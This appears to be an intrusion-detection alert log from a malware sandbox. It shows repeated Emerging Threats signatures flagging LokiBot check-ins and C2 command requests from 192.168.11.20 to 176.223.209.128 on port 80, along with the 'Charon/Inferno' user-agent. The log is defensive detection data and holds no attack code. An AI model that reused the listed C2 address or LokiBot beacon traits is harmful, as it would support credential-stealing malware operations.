                                              11/25/21-10:50:46.446020TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2025381ET TROJAN LokiBot Checkin5014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2025381ET TROJAN LokiBot Checkin5014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2025381ET TROJAN LokiBot Checkin5014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2025381ET TROJAN LokiBot Checkin5015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2025381ET TROJAN LokiBot Checkin5015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2025381ET TROJAN LokiBot Checkin5015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2025381ET TROJAN LokiBot Checkin5015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2025381ET TROJAN LokiBot Checkin5015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2025381ET TROJAN LokiBot Checkin5015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2025381ET TROJAN LokiBot Checkin5015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2025381ET TROJAN LokiBot Checkin5015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2025381ET TROJAN LokiBot Checkin5015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2025381ET TROJAN LokiBot Checkin5015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2025381ET TROJAN LokiBot Checkin5016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2025381ET TROJAN LokiBot Checkin5016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2025381ET TROJAN LokiBot Checkin5016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2025381ET TROJAN LokiBot Checkin5016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2025381ET TROJAN LokiBot Checkin5016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2025381ET TROJAN LokiBot Checkin5016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2025381ET TROJAN LokiBot Checkin5016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2025381ET TROJAN LokiBot Checkin5016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2025381ET TROJAN LokiBot Checkin5016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2025381ET TROJAN LokiBot Checkin5017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2025381ET TROJAN LokiBot Checkin5017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2025381ET TROJAN LokiBot Checkin5017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2025381ET TROJAN LokiBot Checkin5017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2025381ET TROJAN LokiBot Checkin5017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017480192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2025381ET TROJAN LokiBot Checkin5017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2025381ET TROJAN LokiBot Checkin5017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2025381ET TROJAN LokiBot Checkin5017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2025381ET TROJAN LokiBot Checkin5017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2025381ET TROJAN LokiBot Checkin5017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2025381ET TROJAN LokiBot Checkin5018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2025381ET TROJAN LokiBot Checkin5018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2025381ET TROJAN LokiBot Checkin5018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2025381ET TROJAN LokiBot Checkin5018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2025381ET TROJAN LokiBot Checkin5018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2025381ET TROJAN LokiBot Checkin5018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2025381ET TROJAN LokiBot Checkin5018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2025381ET TROJAN LokiBot Checkin5018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2025381ET TROJAN LokiBot Checkin5018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2025381ET TROJAN LokiBot Checkin5018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2025381ET TROJAN LokiBot Checkin5019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2025381ET TROJAN LokiBot Checkin5019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2025381ET TROJAN LokiBot Checkin5019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2025381ET TROJAN LokiBot Checkin5019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2025381ET TROJAN LokiBot Checkin5019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2025381ET TROJAN LokiBot Checkin5019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2025381ET TROJAN LokiBot Checkin5019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2025381ET TROJAN LokiBot Checkin5019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2025381ET TROJAN LokiBot Checkin5019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2025381ET TROJAN LokiBot Checkin5019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2025381ET TROJAN LokiBot Checkin5020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2025381ET TROJAN LokiBot Checkin5020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2025381ET TROJAN LokiBot Checkin5020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2025381ET TROJAN LokiBot Checkin5020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2025381ET TROJAN LokiBot Checkin5020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2025381ET TROJAN LokiBot Checkin5020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020680192.168.11.20176.223.209.128
